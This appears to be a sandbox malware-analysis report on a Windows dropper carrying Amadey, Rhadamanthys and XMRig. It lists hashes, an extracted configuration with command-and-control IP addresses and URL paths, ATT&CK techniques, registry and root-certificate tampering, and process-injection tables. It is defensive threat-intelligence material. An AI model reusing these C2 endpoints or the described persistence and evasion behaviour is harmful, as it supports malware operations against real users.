amadey | e24cfa0f2969d1df115d09223a689d3f1a2c8badaec53e9d925641919a6400ef

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-08-2024 17:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys xmrig 9f93a2 discovery evasion execution miner persistence stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

9f93a2

http://185.208.158.116

http://185.209.162.226

http://89.23.103.42

Attributes

install_dir
3bca58cece
install_file
Hkbsse.exe
strings_key
554ac8d4ec8b2a0ead6c958fdfed18cb
url_paths
/hb9IvshS01/index.php

/hb9IvshS02/index.php

/hb9IvshS03/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

plugin31849

description	pid	Process	procid_target
PID 3576 created 2584	3576	plugin31849	44

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral6/memory/4668-228-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-233-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-234-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-232-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-231-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-230-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-227-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-238-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/4668-239-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2336	powershell.exe
2204	powershell.exe
1736	powershell.exe
2488	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral6/files/0x000b000000023640-119.dat	upx
behavioral6/memory/2396-125-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral6/memory/2324-188-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral6/memory/4668-222-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-226-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-223-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-228-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-233-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-234-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-232-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-231-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-230-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-227-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-225-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-224-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-238-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/4668-239-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

Processes:

flow	ioc
51	raw.githubusercontent.com
52	bitbucket.org
53	bitbucket.org
50	raw.githubusercontent.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
2540	powercfg.exe
1116	powercfg.exe
4924	powercfg.exe
5084	powercfg.exe
3488	powercfg.exe
1752	powercfg.exe
2676	powercfg.exe
1872	powercfg.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Launcher.exeLaunhcer.exeLauncher.exe3plugin13200

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Launhcer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	3plugin13200

Drops file in System32 directory 4 IoCs

Processes:

2plugin28438powershell.exekuytqawknxye.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	2plugin28438
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	kuytqawknxye.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

2plugin28438kuytqawknxye.exe

pid	Process
2396	2plugin28438
2396	2plugin28438
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

kuytqawknxye.exe

description	pid	Process	procid_target
PID 2324 set thread context of 2452	2324	kuytqawknxye.exe	205
PID 2324 set thread context of 4668	2324	kuytqawknxye.exe	207

Drops file in Windows directory 1 IoCs

Processes:

3plugin13200

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	3plugin13200

Executes dropped EXE 15 IoCs

Processes:

Launhcer.exeLauncher.exewget.exewinrar.exeplugin31849wget.exewinrar.exe2plugin28438wget.exewinrar.exe3plugin13200Hkbsse.exekuytqawknxye.exeHkbsse.exeHkbsse.exe

pid	Process
660	Launhcer.exe
1724	Launcher.exe
4164	wget.exe
3644	winrar.exe
3576	plugin31849
1116	wget.exe
4436	winrar.exe
2396	2plugin28438
400	wget.exe
4588	winrar.exe
464	3plugin13200
4920	Hkbsse.exe
2324	kuytqawknxye.exe
3488	Hkbsse.exe
2580	Hkbsse.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
4912	sc.exe
4244	sc.exe
4600	sc.exe
3872	sc.exe
1532	sc.exe
2296	sc.exe
4624	sc.exe
4520	sc.exe
1504	sc.exe
2188	sc.exe
5060	sc.exe
1864	sc.exe
1980	sc.exe
452	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3164	3576	WerFault.exe	94
1596	464	WerFault.exe	107
1824	464	WerFault.exe	107
3772	464	WerFault.exe	107
4372	464	WerFault.exe	107
4960	464	WerFault.exe	107
1780	464	WerFault.exe	107
4636	464	WerFault.exe	107
3644	464	WerFault.exe	107
4680	464	WerFault.exe	107
4652	464	WerFault.exe	107
1980	464	WerFault.exe	107
2176	4920	WerFault.exe	126
3716	4920	WerFault.exe	126
4712	4920	WerFault.exe	126
3576	4920	WerFault.exe	126
3108	4920	WerFault.exe	126
4732	4920	WerFault.exe	126
3200	4920	WerFault.exe	126
4416	4920	WerFault.exe	126
3916	4920	WerFault.exe	126
2956	4920	WerFault.exe	126
3708	3488	WerFault.exe	211

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Launhcer.exeLauncher.exepowershell.exewinrar.exeplugin318493plugin13200powershell.exeopenwith.exewinrar.execmd.exewget.exeLauncher.exewget.exewinrar.exewget.exeHkbsse.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launhcer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	plugin31849
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3plugin13200
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

wget.exewget.exewget.exe

pid	Process
4164	wget.exe
1116	wget.exe
400	wget.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exedwm.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Launhcer.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launhcer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launhcer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launhcer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeplugin31849openwith.exe2plugin28438powershell.exekuytqawknxye.exepowershell.exedwm.exe

pid	Process
2336	powershell.exe
2336	powershell.exe
2204	powershell.exe
2204	powershell.exe
3576	plugin31849
3576	plugin31849
4620	openwith.exe
4620	openwith.exe
4620	openwith.exe
4620	openwith.exe
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
1736	powershell.exe
1736	powershell.exe
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2396	2plugin28438
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2488	powershell.exe
2488	powershell.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
2324	kuytqawknxye.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedwm.exe

description	pid	Process
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeShutdownPrivilege	5084	powercfg.exe
Token: SeCreatePagefilePrivilege	5084	powercfg.exe
Token: SeShutdownPrivilege	3488	powercfg.exe
Token: SeCreatePagefilePrivilege	3488	powercfg.exe
Token: SeShutdownPrivilege	4924	powercfg.exe
Token: SeCreatePagefilePrivilege	4924	powercfg.exe
Token: SeShutdownPrivilege	1116	powercfg.exe
Token: SeCreatePagefilePrivilege	1116	powercfg.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeShutdownPrivilege	1872	powercfg.exe
Token: SeCreatePagefilePrivilege	1872	powercfg.exe
Token: SeShutdownPrivilege	1752	powercfg.exe
Token: SeCreatePagefilePrivilege	1752	powercfg.exe
Token: SeShutdownPrivilege	2676	powercfg.exe
Token: SeCreatePagefilePrivilege	2676	powercfg.exe
Token: SeShutdownPrivilege	2540	powercfg.exe
Token: SeCreatePagefilePrivilege	2540	powercfg.exe
Token: SeLockMemoryPrivilege	4668	dwm.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

wget.exewinrar.exewget.exewinrar.exewget.exewinrar.exe3plugin13200

pid	Process
4164	wget.exe
3644	winrar.exe
3644	winrar.exe
1116	wget.exe
4436	winrar.exe
4436	winrar.exe
400	wget.exe
4588	winrar.exe
4588	winrar.exe
464	3plugin13200

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exeLaunhcer.exepowershell.exeLauncher.exeplugin318493plugin13200cmd.execmd.exekuytqawknxye.exe

description	pid	Process	procid_target
PID 4524 wrote to memory of 660	4524	Launcher.exe	85
PID 4524 wrote to memory of 660	4524	Launcher.exe	85
PID 4524 wrote to memory of 660	4524	Launcher.exe	85
PID 4524 wrote to memory of 660	4524	Launcher.exe	85
PID 4524 wrote to memory of 660	4524	Launcher.exe	85
PID 660 wrote to memory of 2336	660	Launhcer.exe	86
PID 660 wrote to memory of 2336	660	Launhcer.exe	86
PID 660 wrote to memory of 2336	660	Launhcer.exe	86
PID 2336 wrote to memory of 1724	2336	powershell.exe	88
PID 2336 wrote to memory of 1724	2336	powershell.exe	88
PID 2336 wrote to memory of 1724	2336	powershell.exe	88
PID 2336 wrote to memory of 1724	2336	powershell.exe	88
PID 2336 wrote to memory of 1724	2336	powershell.exe	88
PID 1724 wrote to memory of 2204	1724	Launcher.exe	89
PID 1724 wrote to memory of 2204	1724	Launcher.exe	89
PID 1724 wrote to memory of 2204	1724	Launcher.exe	89
PID 1724 wrote to memory of 4164	1724	Launcher.exe	91
PID 1724 wrote to memory of 4164	1724	Launcher.exe	91
PID 1724 wrote to memory of 4164	1724	Launcher.exe	91
PID 1724 wrote to memory of 3644	1724	Launcher.exe	93
PID 1724 wrote to memory of 3644	1724	Launcher.exe	93
PID 1724 wrote to memory of 3644	1724	Launcher.exe	93
PID 1724 wrote to memory of 3576	1724	Launcher.exe	94
PID 1724 wrote to memory of 3576	1724	Launcher.exe	94
PID 1724 wrote to memory of 3576	1724	Launcher.exe	94
PID 1724 wrote to memory of 1116	1724	Launcher.exe	95
PID 1724 wrote to memory of 1116	1724	Launcher.exe	95
PID 1724 wrote to memory of 1116	1724	Launcher.exe	95
PID 3576 wrote to memory of 4620	3576	plugin31849	97
PID 3576 wrote to memory of 4620	3576	plugin31849	97
PID 3576 wrote to memory of 4620	3576	plugin31849	97
PID 3576 wrote to memory of 4620	3576	plugin31849	97
PID 3576 wrote to memory of 4620	3576	plugin31849	97
PID 1724 wrote to memory of 4436	1724	Launcher.exe	101
PID 1724 wrote to memory of 4436	1724	Launcher.exe	101
PID 1724 wrote to memory of 4436	1724	Launcher.exe	101
